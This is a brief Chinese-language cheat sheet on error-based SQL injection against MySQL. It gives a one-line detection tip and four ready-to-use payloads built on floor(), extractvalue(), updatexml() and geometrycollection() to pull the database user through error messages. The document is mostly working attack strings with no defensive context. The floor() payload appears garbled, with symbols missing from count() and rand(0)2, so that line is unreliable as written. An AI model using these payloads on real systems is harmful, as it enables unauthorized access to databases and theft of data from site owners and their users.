1、判断报错注入
输入 ’ 返回错误信息,则可能存在报错注入
2、常用的报错注入函数
//1、floor()函数
//例如
1' and (select 1 from (select count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by x)a)
//2、extractvalue()
//例如
1' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
//3、updatexml()
//例如
1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))
//4、geometrycollection()
//例如
1' and geometrycollection((select * from(select * from(select user())a)b))